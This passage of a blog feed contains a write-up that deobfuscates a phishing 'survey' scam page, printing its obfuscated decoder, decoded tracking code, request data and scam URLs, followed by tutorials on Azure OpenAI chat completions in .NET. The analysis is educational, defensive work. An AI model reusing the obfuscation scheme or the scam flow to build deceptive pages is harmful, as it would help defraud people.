You’ll find a gist of the source if you want to play along.\nI expected that it’d work similar to the local file ones I looked at last time, and that turned out to be correct. There’s a huge string of text and some obfuscated functions in the code. This is the most interesting part (formatted for readability):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 var _0xc50e = [ "", "split", "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/", "slice", "indexOf", "", "", ".", "pow", "reduce", "reverse", "0", ]; function _0xe23c(d, e, f) { var g = _0xc50e[2][_0xc50e[1]](_0xc50e[0]); var h = g[_0xc50e[3]](0, e); var i = g[_0xc50e[3]](0, f); var j = d[_0xc50e[1]](_0xc50e[0]) [_0xc50e[10]]() [_0xc50e[9]](function (a, b, c) { if (h[_0xc50e[4]](b) !== -1) return (a += h[_0xc50e[4]](b) * Math[_0xc50e[8]](e, c)); }, 0); var k = _0xc50e[0]; while (j > 0) { k = i[j % f] + k; j = (j - (j % f)) / f; } return k || _0xc50e[11]; } What’s it doing? We’ll notice the array, _0xc50e which starts it off and it’s essentially acting as a utility for the rest of the code, as those are the relevant pieces of info to make up a string.\nThe function _0xe23c is then invoked several times to decode HTML chunks to then generate the HTML that goes into the page, and this works by looking at parts of _0xc50e and then using that to decode the string that was passed into it. Let’s take it line by line:\n1 var g = _0xc50e[2][_0xc50e[1]](_0xc50e[0]); Admittedly this isn’t that readable, but lets deobfuscate it. _0xc50e[2] is the string 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/ and then it’s calling split on it, which will split it into an array of characters. So g is now an array of characters.\n1 2 3 var g = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/"[ "split" ](""); There, that’s readable. Next up:\n1 var h = g[_0xc50e[3]](0, e); This is a bit more interesting, it’s calling slice on the array, which will return a new array with the elements from the start index to the end index. So h is now an array of characters from the start of 0 to the value of e. When debugging, the first time through e was 6, so we ended up as an array of the first 6 characters of the string, which are the numbers 0 to 5. The next line is similar, just with a different end point in the string.\nWe then come to this lovely bit of code:\n1 2 3 4 5 6 var j = d[_0xc50e[1]](_0xc50e[0]) [_0xc50e[10]]() [_0xc50e[9]](function (a, b, c) { if (h[_0xc50e[4]](b) !== -1) return (a += h[_0xc50e[4]](b) * Math[_0xc50e[8]](e, c)); }, 0); Let’s deobfuscate it and look at what it’s doing now:\n1 2 3 4 5 6 var j = d["split"]("") ["reverse"]() ["reduce"](function (a, b, c) { if (h["indexOf"](b) !== -1) return (a += h["indexOf"](b) * Math["pow"](e, c)); }, 0); So it’s taking the string that was passed in, splitting it into an array of characters, reversing that array and then reducing it. The reduce function is then looking at each character in the array and if it’s in the h array (which is the first 6 characters of the string) then it’s adding the index of that character in the h array multiplied by e to the accumulator. The accumulator is initialised to 0 so the first time through it’ll be 0 + 0 * 6 which is 0. The next time through it’ll be 0 + 1 * 6 which is 6. The next time through it’ll be 6 + 2 * 6 which is 18. 
And so on.\nFinally, we have our loop and return value:\n1 2 3 4 5 6 var k = _0xc50e[0]; while (j > 0) { k = i[j % f] + k; j = (j - (j % f)) / f; } return k || _0xc50e[11]; Deobfuscation won’t help much, the magic variables point to '' within the array, creating a starting string. We then loop around while using remainder operator to jump through i and find a number to return. This number is then used by the calling function to look up character in another array which is decoded elsewhere as a character code to then get the string character. Here’s a calling function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 function (h, u, n, t, e, r) { r = ""; for (var i = 0, len = h.length; i < len; i++) { var s = ""; while (h[i] !== n[e]) { s += h[i]; i++; } for (var j = 0; j < n.length; j++) s = s.replace(new RegExp(n[j], "g"), j); r += String.fromCharCode(_0xe23c(s, e, 10) - t); } return decodeURIComponent(escape(r)); } And it was receiving a huge string like ZQvZvxZZQvZxZQvZZxZZZZZxZZQZvxZQvvQxZZQvQxZZZZQxZvZvxZZZvQxZZZQZxZZ (only with 50k characters in it), and the values 89,"QZvxOrGpf",4,3,35, which is then used to decode the string.\nUltimately, it generated the html you’ll find in generated-html.html of the attached gist. The page actually runs this sort of code 3 more times, but with different keys. Inspecting the other ones showed that they were doing output that was injecting JavaScript into the page using eval (which is how the stuff was executed at the end of the decoding). Here’s the output I found:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 // Decode #1 LNG = "1"; CMP = "Aussie"; CNT = "14"; BID = "393074817"; FNP = "c267f14ded62310d74cffcc6dc2d9395"; CMPID = "175"; // Decode #2 API_URL = "https://amplinesrv.com"; const st = 0; var currentdate = new Date(); var months = [ "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", ]; $(".date-full").html( months[currentdate.getMonth()] + " " + currentdate.getDate() + ", " + currentdate.getFullYear() ); if ($("#comment-page").length > 0) { $(".footer").addClass("fr2"); } // Decode #3 aff_id = "350115"; click_id = "1057046844"; Brand = "1782"; lpid = "3038"; lpow = "35"; prepop = "email:;phone:;zipcode:".split(";"); emailURL = prepop[0].split(":")[1].replace(/\\s+/g, ""); phoneURL = prepop[1].split(":")[1]; zipcodeURL = prepop[2].split(":")[1]; cityURL = ""; stateURL = ""; languageCode = "EN"; countryCode = "AU"; popUrl = '{"popunder_mode":[{"id":"1431","id_campaign":"3079","id_popunder":"0","type":"0","refresh_id":"0","device":"0","active":"1","popunder_refresh_id":"0"}],"urls":""}'; // Decode #4 var answered = 0; var prevProgress = 0; var stepsTotal = 0; var progress = 0; var cheerstx = ""; var txt = ""; function cheers(prog = "100") { if (prog == 0) { txt = "- Let's begin! Go for that reward"; } if (prog > 0 && prog < 25) { txt = "- What a start! Let's go for it"; } if (prog >= 25 && prog < 50) { txt = "- What! Almost half way there"; } if (prog == 50) { cheerstx = "- You're half way there!"; } if (prog > 50 && prog < 75) { txt = "- Superb job! Almost there"; } if (prog >= 75 && prog < 100) { txt = "- Great! 
Almost done"; } if (prog == "100") { txt = "- Done!"; } $(".pb-cheers").text(txt); } I was a little disappointed that I didn’t have the element matching $('.pb-cheers') anywhere on the page to get congratulated as I progressed through the survey. Poor form phishers, if you’re going to have code to cheer me on, at least use it! (also, it’s weird that 50% doesn’t write to txt but to a different variable that isn’t used anywhere else)\nTaking the survey Naturally, the next thing I had to do was actually take the survey. Clicking each option would result in this function being called:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 function nextQuestionU(args) { aId = args.aId; reg = "reg" in args ? args.reg : false; rval = "rval" in args ? args.rval : null; multi = "multi" in args ? args.multi : false; pos = "pos" in args ? args.pos : false; dyn = "dyTyId" in args ? args.dyTyId : false; dy_ind = "dyIndId" in args ? args.dyIndId : false; dy_prod = "dyProdId" in args ? args.dyProdId : false; let moref = "&pos=" + pos; if (reg) { var multiData = ""; if (multi) { multiData = "&multi=true"; } moref += "&reg=true&regVal=" + rval + multiData; } if (dyn) { moref += "&dyId=" + dyn + "&dy_ind=" + dy_ind + "&dy_prod=" + dy_prod; } $(".answerOption").removeAttr("onclick"); $.ajax({ type: "POST", // url: "", // data: "_type=ajax&_action=master-saveAnswer&sid="+sId+'&qid='+qId+'&aid='+aId+'&step='+numStep+moref, url: API_URL + "/survey/saveAnswer", data: "bid=" + BID + "&fnp=" + FNP + "&sid=" + sId + "&lid=" + LNG + "&cmp=" + encodeURIComponent(CMP) + "&cnt=" + CNT + "&qid=" + qId + "&aid=" + aId + "&step=" + numStep + moref, dataType: "json", success: function (d) { let data = d; // let data = d.data; let prevProgress = $(".pb-percent").text(); let answered = data.step - 1; if (answered == 1) { mfq_tags("first-question"); } let stepsTotal = data.totalSteps; let progress = (answered / stepsTotal) * 100; $(".sprogress").css("width", progress + "%"); $({ someValue: prevProgress }).animate( { someValue: progress }, { duration: 1000, easing: "swing", step: function () { $(".pb-percent").text(Math.round(this.someValue)); }, } ); if (data.id) { numStep = data.step; $("#questionBody, #questionText, #questionFooter").html(""); /* $("#container-survey").css({backgroundImage: 'none'}); */ $(".sprogressbar").slideDown(); $("#questionText").removeClass("email-title"); $("#questionFooter").removeClass("email-sub"); $("#questionText").append(data.question); $("#questionFooter").html(data.text_footer); switchTypeQuestionsU(data); } else { mfq_tags("last-question"); showOfferWallU(); } cheers(progress); }, }); } The args being passed in is a reference to which answer you’ve selected, which came back from the server in the AJAX call (and shout-out to jQuery for still being around, this reminds me of years gone by 😜). The request doesn’t contain anything much of interest:\nbid: 393074817 fnp: c267f14ded62310d74cffcc6dc2d9395 sid: 39 lid: 1 cmp: Aussie cnt: 14 qid: 26 aid: 649 step: 1 pos: false What I can gather is that the fnp is the unique tracking ID for me and cmp is the “campaign” they are pretending to be (Aussie is my broadband provider). 
The value of bid seems static across sessions too, so I’d assume it’s just another part of their tracking.\nAnd here’s a sample response back:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 { "id": "6", "sort": "2", "question": "What is your age range?", "questions_type_id": "1", "text_disclaimer": null, "text_footer": null, "is_conditional": "0", "conditional_rules": null, "answers": [ { "id": "51", "actId": null, "regId": null, "cusId": null, "sort": "1", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "35", "cusName": null, "text": "18-29" }, { "id": "52", "actId": null, "regId": null, "cusId": null, "sort": "2", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "72", "cusName": null, "text": "30-39" }, { "id": "53", "actId": null, "regId": null, "cusId": null, "sort": "3", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "74", "cusName": null, "text": "40-49" }, { "id": "54", "actId": null, "regId": null, "cusId": null, "sort": "4", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "40", "cusName": null, "text": "50-64" }, { "id": "55", "actId": null, "regId": null, "cusId": null, "sort": "5", "posId": null, "dynamic": "0", "dynamic_type_id": null, "dynamic_industry_id": null, "dynamic_product_category_id": null, "aid": "41", "cusName": null, "text": "65+" } ], "totalSteps": 8, "step": 2, "jkey": null, "trf": "0" } I’ve got to admit, there’s quite a lot of data in the response, sure, it’s mostly null, but that’s a large property set and none of the responses ever populated them. I guess there’s a variety of flows that could use this backend and they just return the same data structure for all of them, adjusting the data in the response as needed.\nThe questions that you go through are pretty standard, it’s the illusion of profiling you through age, shopping habits, gender (which in this one only had Male and Female, but the one Chrome got had Male, Female and Other - yay for inclusion?), etc. 
but interestingly enough there was no real data capture like name, email, the stuff you’d expect they are really after.\nOnce the survey was completed I was told my details were being checked:\nShockingly, the progress bar and “checks” aren’t doing anything:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 setTimeout(function () { $(".check1") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text1.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("30%"); $(".pb_process").css({ width: "30%" }); $(".load_text2").fadeIn(1000); }, 3000); setTimeout(function () { $(".check2") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text2.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("60%"); $(".pb_process").css({ width: "60%" }); $(".load_text3").fadeIn(1000); }, 5000); setTimeout(function () { $(".check3") .removeClass("fa-spinner fa-spin") .addClass("fa-check-circle") .show(); $(".load_text3.loadtxstrip").css({ color: "#e4e3e3" }); $("#percent_s").html("100%"); $(".pb_process").css({ width: "100%" }); }, 7500); setTimeout(function () { $(".validate_s").slideUp(); $(".ms_init").fadeOut(function () { $("#thankyou-container").fadeIn(); }); $(".reward-page").slideDown(500); }, 7750); I really admire the staggered setTimeout calls, because if something caused one of them to error or run longer, you could end up with things out of order! 🤣\nIt is making another server call at the same time, which gets the HTML for the prizes, but it also doesn’t wait for the checks to finish before rendering the HTML, so depending on the network connection you can see the prizes before the checks are done, or the checks can be done and dismissed well before the prizes are rendered.\nAnyway, here’s what I “won”:\nClicking these links sent me off to another site, https://gifturcards.net/l/hI65ff1SfppIxFiro7kF?_luuid=988bf154-bb2b-4606-b300-14c6a07c53ae for example (again, remember that this is a scam site) where they are finally doing some data capture!\nI didn’t dig too much into the prize site as it’s pretty clear how the scam is going to go from here, and looking at the code it’s not doing anything that isn’t overly obvious, there’s a form, it captures your info and moves yo along to get more info until you hand over a credit card and you’re subscribed to something that you probably won’t get out of with ease.\nWrapping up I find it fascinating the level of complexity in the obfuscation that is used to create a page like this, the fact that there was multiple cyphers in the page and the decoding of the code to result in the HTML or JS that was injected was really quite complex.\nAnyway, that was a fun way to spend a few hours!\n", "id": "2023-09-20-oh-look-a-phishing-attempt" }, { "title": "Generative AI and .NET - Part 3 Chat Completions", "url": "https://www.aaron-powell.com/posts/2023-09-07-generative-ai-and-dotnet---part-3-chat-completions/", "date": "Thu, 07 Sep 2023 06:30:42 +0000", "tags": [ "dotnet", "ai" ], "description": "Chatty - finish this sentence for me", "content": "If you followed the code sample in the last post you’ll have a console application that can generate chat completions, but what I didn’t do was explain what chat completions are or why we’d use them; that’s the purpose of this post.\nWhat is a Chat Completion A chat completion is a way of generating text based on a prompt. 
The prompt is a piece of text that you provide, and the completion is the text that is generated by the model. The model is a machine learning model that has been trained on a large corpus of text, and the prompt is used to seed the model to generate the completion.\nWe saw this in action in the first blog post: if I was to give a prompt of “The quick brown fox” then the completion would be “jumps over the lazy dog”. But this is only part of what we’re looking at here, that is a completion, but with OpenAI we use chat completions.\nA chat completion is a completion that is generated based on a conversation, and is intended to come across as a natural response to the conversation. And here is how we’re starting to break away from our LLM being a glorified auto-complete for your phone keyboard and into something that is more like carrying on a conversation.\nNow this isn’t truly a conversation, the model doesn’t understand what you’re saying, it’s just generating text based on the prompt and the model, but it’s been trained in a manner that makes it appear to be conversational.\nCreating a Chat Completion We saw this in the last sample, where we execute a chat completion using the GetChatCompletionsAsync method, passing in the model (or deployment in Azure OpenAI Service’s case) and an instance of ChatCompletionsOptions.\nThe ChatCompletionsOptions class is used to provide configuration parameters for our call to the service, matching the parameters in the REST API.\nInitially, we’ll leave the parameters at their default values and focus on the one thing you must provide, the prompt, which we can either provide in the constructor or by adding it to the Messages property of the object:\n
string prompt = "Describe the most recent Star Wars film.";

ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) });
\nYou’ll notice here that we’re providing the prompt variable to a ChatMessage object in which we set ChatRole.User as the role for this message. We’ll cover prompt engineering in depth at a later date, but the quick view of it is that we use the role to help our model understand context around what the prompt is, because while the prompt can be just a single sentence, to make it really conversational we’re likely going to want to provide more context around that. Since the prompt is from user input, we indicate that with the ChatRole.User, letting the model know that this is something to respond to. We could add a response from the model by adding a ChatRole.Assistant message to the Messages property. There’s also System and Function, but we’ll cover them when we look at prompt engineering.\nIf we were to execute this prompt:\n
Response<ChatCompletions> completions = await client.GetChatCompletionsAsync(model, options);

foreach (ChatChoice choice in completions.Value.Choices)
{
    string content = choice.Message.Content;
    Console.WriteLine(content);
}
\nWe’d get a response like this:\nAs an AI language model, I cannot have personal feelings, opinions, or experiences. But, I can provide an objective description of the movie “Star Wars: The Rise of Skywalker.”\n“Star Wars: The Rise of Skywalker” is a 2019 epic space opera film directed by J. J. Abrams and serves as a concluding chapter in the Skywalker Saga. 
The movie follows the story of Rey, Finn, Poe, and their allies as they embark on a mission to find Exogol, the hidden planet where the evil Palpatine has been resurrected and is preparing to launch a final attack against the Resistance.\nThroughout the movie, the characters undergo various challenges and confrontations against Palpatine’s forces. They also uncover deep secrets about their families and their connections to the Force.\nThe musical score, visual effects, and action sequences depicted in the film received praise from critics and audiences. However, some fans and critics criticized the movie’s pacing, storylines, and inconsistency with previous installments in the franchise. Despite this, “Star Wars: The Rise of Skywalker” was a box-office success, grossing over $1 billion worldwide.\nNote: Your result would likely be different as the output won’t be word-for-word consistent, it’ll only be consistent in the general theme - this is generative after all.\nTweaking our Chat Completion When we are working with our model we might want to tweak how it behaves and we can do that by providing additional parameters to the ChatCompletionOptions object. Since it will be “making up” an answer we run the risk of a hallucination in which the model gives as a result that is completely fabricated with no basis in reality.\nTo adjust this, we can play with the Temperature property. By default, this is set to 1.0 and must be between 0 and 2. Let’s execute our chat completion with a temperature of 0.5 (you can use the Polyglot Notebook in my repo):\n1 2 3 4 ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) }) { Temperature = 0.5f }; Running it again yields a result such as this:\nAs an AI language model, I do not have personal experience or emotions, but I can provide an objective description of the most recent Star Wars movie.\nThe most recent Star Wars movie is “Star Wars: The Rise of Skywalker,” which was released in December 2019. The movie is directed by J.J. Abrams and follows the story of Rey, Finn, and Poe as they try to defeat the evil First Order and its leader, Kylo Ren.\nThe movie begins with the discovery of a mysterious transmission from the late Emperor Palpatine, who has somehow returned from the dead and is threatening to destroy the galaxy. Rey, Finn, and Poe embark on a dangerous mission to find and destroy the Emperor once and for all.\nThroughout the movie, the characters face many challenges and obstacles, including battles with the First Order, encounters with new and old allies, and personal struggles with their own identities and pasts.\nIn the end, the movie culminates in a final battle between the Resistance and the First Order, with Rey and Kylo Ren facing off against the Emperor in a dramatic and emotional showdown. 
The movie ends with a sense of closure and resolution, as the characters come to terms with their pasts and look towards a new future.\nIt’s a little more clinical than the original, arguably less creative, but it’s also less likely to be completely made up (although we are using a fairly well documented movie, so there is a lot of grounding data that the model would have been trained on).\nLet’s go the other way and turn the creativity all the way up to 2:\n1 2 3 4 ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) }) { Temperature = 2.0f }; Now let’s see a result:\nAs an AI language model, I cannot Recent mostly Subject to Human’s Reaction.\nThe Star Wars series witnessed the december “without grandeur”: chaotic reviews reminded observers advance weaknesses; quarantine-amperf_likelyturned expectation ainvolk_monolith front-cricket media_machine difference years directly sharpen memorable grandfilm inspired director galaxies making Rey fighter_clinks awakened baby_yorzutan cliff_news sources attempts, ensure timing humorous monsters-story full_score writers fuelde motion_center_technybots intense-_energy universe tale unmistakize background hope defntt_difference audience vast_difference symbolism incredible_Tolkien esacaranthros tozkheeri. Being recours_referred_epoe experts found simply entire points unmatched movie fascinating_author had awink_pepping movie approach towards fall dramatically restared ‘9_genre continues did excellent years!".\nWell, that’s pretty terrible! I ran the same prompt a few times and each time I got an equally terrible result. But this is to be expected. We “told” the model to go completely wild and it did, and it’s not going to be able to generate something that is coherent when that’s done because all it is trying to do is combine letters together to make something that looks like a word. After all, if we look at the output there are words in there and some of those words are relevant to Star Wars, galaxies, Rey, fighter, hope, and so on, but they aren’t words forming sentences.\nRealistically, you would likely want a Temperature of just below 1 as this gives you a good balance between creativity and coherence, but it’s the sort of thing you need to experiment with in your own applications.\nThere are also other parameters that you can tweak, such as TopP and FrequencyPenalty, that you can use to adjust the output of your model. I’ll leave it to you to experiment with those.\nPlaying with TopP While Temperature is one way to control the output, the other useful one is top_p, or as it’s exposed in the .NET SDK, NucleusSamplingFactor (which is what it refers to in AI terminology). While Temperature controls the randomness of the output generated, NucleusSamplingFactor controls the diversity of the output by controlling the number of tokens that are considered when generating the output, the higher the value the more tokens are considered.\nUsing a low value for NucleusSamplingFactor, say 0.1f, the result from the model will only consider words in the top 10% of confidence that that would be the next word to come in the completion, meaning that the completion should seem “more correct”, but it will also be less creative and less diverse in the set of words used. 
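To make that concrete, here's a minimal sketch of dialling the nucleus sampling right down - it assumes the same client, model and prompt variables used in the earlier snippets of this post:

// Low nucleus sampling: only the most probable tokens (roughly the top 10% of the
// cumulative probability) are considered at each step of the completion.
// Temperature is left at its default, since we only want to adjust one of the two knobs.
ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) })
{
    NucleusSamplingFactor = 0.1f
};

Response<ChatCompletions> completions = await client.GetChatCompletionsAsync(model, options);
Console.WriteLine(completions.Value.Choices[0].Message.Content);
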
Swinging to the other end of the spectrum and using 1f (it must be a value between 0 and 1) will mean that all words are considered, so the completion will be more creative, but it will also run the risk of being less coherent.\nIt’s important when you’re tweaking these values that you choose whether you want to control the Temperature or the Nucleus Sampling Factor, as you only want to adjust one of them, not both, as they are both controlling the same thing, just in different ways.\nResulting Object The GetChatCompletionsAsync returns a Response<ChatCompletions>, in which the Response<T> is a wrapper type from Azure with some info about the response, such as the HTTP status, but what we’re really interested in is the ChatCompletions object. From here we can look at info from the service, such as the Id of the completion, the usage information of the available tokens, and most importantly the Choices property.\nChoices are the responses from the model and contain the Message (we’ll come back to that), FinishReason (why the model stopped generating text), Index (the index of the choice in the list of choices), and ContentFilterResults (was there any flagging for hate, sexual content, etc.).\nThe Message property is an instance of ChatMessage and contains the Content, which is the generated text that you are going to display to the user, as well as information about the function, but OpenAI functions are a topic for a later date.\nSo far we’ve only seen a single choice come back, which is because that’s the default on ChatCompletionsOptions, but you can change this with the ChoiceCount property, although that doesn’t guarantee that you’ll get that many choices back, it’s just the maximum number of choices you’ll get back.\nConclusion The core of a text-based application with Generative AI is built around chat completions. We’ve seen that with a call to GetChatCompletionsAsync we can generate a response to a prompt, and that we can tweak the parameters to get different results.\nWe saw that by tweaking the Temperature and NucleusSamplingFactor we can control the creativity and coherence of the response. If we go too far in either extreme the output really stops being useful - especially an “overly creative” temperature setting. We also saw that we can use the ChoiceCount to control the maximum number of responses that we want to get back.\nThere are other properties on the ChatCompletionsOptions that we can adjust to control the output, and as we dive deeper into more advanced aspects of working with Generative AI we’ll look at those.\nIf you want to play with this sample, check out the Polyglot Notebook in my repo.\n", "id": "2023-09-07-generative-ai-and-dotnet---part-3-chat-completions" }, { "title": "Generative AI and .NET - Part 2 SDK", "url": "https://www.aaron-powell.com/posts/2023-09-04-generative-ai-and-dotnet---part-2-sdk/", "date": "Mon, 04 Sep 2023 23:55:34 +0000", "tags": [ "dotnet", "ai" ], "description": "Let's take a look at the SDK for OpenAI and how we can use it.", "content": "It’s time to have a look at how we can build the basics of an application using Azure OpenAI Service and the .NET SDK. Remember, while I will be using AOAI in here everything is going to be applicable to OpenAI itself as well, so if you’re using that you can still follow along (I just happen to use AOAI as then I can test it for the product team).\nGetting Started Before we install the SDK it’s important to know how we work with these services, and that is via the REST API that they publish. 
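To give a rough idea of what that looks like under the hood, here's a minimal sketch of calling the Azure OpenAI chat completions endpoint with nothing but HttpClient - the service name, deployment name, API key and api-version are all placeholders you'd need to fill in, and the api-version value changes over time, so check the current REST docs:

using System.Net.Http;
using System.Text;

// Raw REST call to the chat completions endpoint - the SDK we're about to install wraps this up for us.
// Placeholders: <your service>, <deployment>, <api-version> and the api-key value.
HttpClient http = new();
http.DefaultRequestHeaders.Add("api-key", "<your AOAI API key>");

string url = "https://<your service>.openai.azure.com/openai/deployments/<deployment>/chat/completions?api-version=<api-version>";
string body = """{ "messages": [ { "role": "user", "content": "What is the colour of the sky?" } ] }""";

HttpResponseMessage response = await http.PostAsync(url, new StringContent(body, Encoding.UTF8, "application/json"));
Console.WriteLine(await response.Content.ReadAsStringAsync());
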
Azure OpenAI Service has docs on their REST API but I find them a little unfriendly to read (at least, at the time of writing this blog post) compared to the REST API docs from OpenAI directly.\nBut if you look at them, you’ll notice that the OpenAPI (Swagger) spec is the same for both, so you can use the OpenAI docs to get a better understanding of the API, the parameters and how to call it. The only real difference is the endpoint, OpenAI or your AOAI instance, and the authentication method.\nInstalling the SDK While it’s useful to understand the underpinnings of all this, you’re probably not going to want to use the REST API directly, instead we’ll use the .NET SDK for that, which you’ll find on NuGet as Azure.AI.OpenAI. Yes, there are others out there on NuGet but this is the official one from Microsoft, so I’m going to use that.\nCreating a Client The first thing we need to do is create a client, and we do that by creating an instance of the OpenAIClient class, which is in the Azure.AI.OpenAI namespace. Depending on whether you’re using it with AOAI or OpenAI, the constructor you choose is going to be different.\n
// Creating a client for AOAI
OpenAIClient client = new OpenAIClient(new Uri("https://<your service>.openai.azure.com"), new Azure.AzureKeyCredential("<your AOAI API key>"));

// Creating a client for OpenAI
client = new OpenAIClient("<your OpenAI API key>");
\nFrom then on it doesn’t matter if you’re using AOAI or OpenAI, the rest of the code is the same, since it’s the same type, OpenAIClient, that is used to interact with the service.\nGenerating Chat Completions Now that we have a client, let’s have a look at how to get it to do something, and that something will be to generate a chat completion. Don’t worry if you’re not familiar with what a chat completion is, we’ll dive into that properly in the next post, but for now consider it as the most common way you would work with the service.\nTo generate a chat completion we need to call the GetChatCompletionsAsync method, passing in the model we want to use, and the prompt to complete:\n
ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, "What is the colour of the sky?") });

string model = "<deployment name or GPT model>";

Response<ChatCompletions> completions = await client.GetChatCompletionsAsync(model, options);

foreach (ChatChoice choice in completions.Value.Choices)
{
    string content = choice.Message.Content;
    Console.WriteLine(content);
}
\nThis gave me the response of:\nThe color of the sky can vary depending on factors such as time of day, weather conditions, and location. Generally, during the day when the sun is out, the color of the sky is blue. At sunset or sunrise, the sky can turn shades of red, orange, and pink. At night, the sky can appear black or dark blue with stars visible.\nYou might be wondering though, what do you provide for the model parameter? Well, this will depend on which service you are using, if it’s AOAI you will first deploy a model and then use the name of that deployment, if it’s OpenAI you will use the name of the model, such as gpt-3.5-turbo.\nConclusion Congratulations, we have created our very first call to OpenAI and generated a chat completion response from a prompt (that was admittedly hard-coded). 
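If you want to go a step further than the hard-coded prompt, here's a small sketch (reusing the client and model variables from above) that keeps asking for prompts from the console until you enter a blank line:

// A tiny prompt loop over the example above. Note that each iteration sends a single,
// stand-alone message - there's no conversation history being kept between prompts.
while (true)
{
    Console.Write("Prompt> ");
    string? prompt = Console.ReadLine();
    if (string.IsNullOrWhiteSpace(prompt))
    {
        break;
    }

    ChatCompletionsOptions options = new(new[] { new ChatMessage(ChatRole.User, prompt) });
    Response<ChatCompletions> completions = await client.GetChatCompletionsAsync(model, options);
    Console.WriteLine(completions.Value.Choices[0].Message.Content);
}
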
If you want to have a play around with this, I’ve created a Polyglot Notebook that you can check out in my website repo.\nIn the next post we’ll take a proper look at what chat completions are, and how we can use them.\n", "id": "2023-09-04-generative-ai-and-dotnet---part-2-sdk" }, { "title": "Generative AI and .NET - Part 1 Intro", "url": "https://www.aaron-powell.com/posts/2023-09-01-generative-ai-and-dotnet---part-1-intro/", "date": "Fri, 01 Sep 2023 06:24:30 +0000", "tags": [ "dotnet", "ai" ], "description": "It's time to start a new series with everyone's favourite topic of the moment, AI!", "content": "I’ve missed a lot of the recent hype trains, I skipped over blockchain, I avoided web3, and I’m not dumb enough to have believed NFT’s were anything but a scam, but I’m not going to miss out on the AI hype train! Toot toot!\nOver the past few weeks I’ve been digging into how we can build stuff with .NET and AI, specifically Generative AI which we see with platforms such as OpenAI, and more specifically Azure OpenAI Service.\nWhile there is heaps of content out there on using these services I’ve noticed that it tends to be heavy in Python, and while I’m not against Python, it’s not a language I’m overly familiar with, so I wanted look at how we can use these services with .NET. Also, a lot of the content is really skewed towards people who are already well versed in the terminology, the concepts, and the tools, so I wanted to try and make this a bit more accessible to people who are new to the space.\nSo, over this series I’m going to share my learnings on the APIs, SDKs, and the like. The goal here isn’t to “build something” but rather to share what I’ve learnt, the mistakes I’ve made, the things I’ve found confusing, and the code I’ve had to rewrite umpteen times because “oh, that’s a better way to do it”.\nBut before we get started, I want to make something clear - I am 100% a consumer in this AI story, I’m not an AI expert, an AI researcher, or have any real understanding on how AI models work, and I think that’s an important way to approach this; I’m approaching it as someone who knows how to code and is just trying to do it against a new set of libraries.\nNow, without further ado, let’s talk theory.\nWhat is Generative AI? Throughout this series I’ll be looking at a specific part of the AI landscape and that’s Generative AI. After all, AI isn’t anything new, it’s been around for decades, but what is new is the way it can generate new content, and this is what makes things like OpenAI stand out from previous AI systems.\nI’m going to keep referring back to OpenAI, as that’s the platform I’m using (well, I use it with Azure OpenAI Service), but there are other platforms out there that will have their own APIs and SDKs. I don’t have experience with them so I can’t comment on them, but I’m sure the concepts will be similar.\nSo, what is Generative AI? Well, it’s a system that can generate new content based on existing content. For example, you can give it a sentence and it will generate a new sentence based on what we started with, aka, the prompt.\nFor example, if we give it the prompt “The quick brown fox jumps over” it might return us “the lazy dog”, as that’s the most likely continuation, or completion to use the correct terminology, of that sentence. 
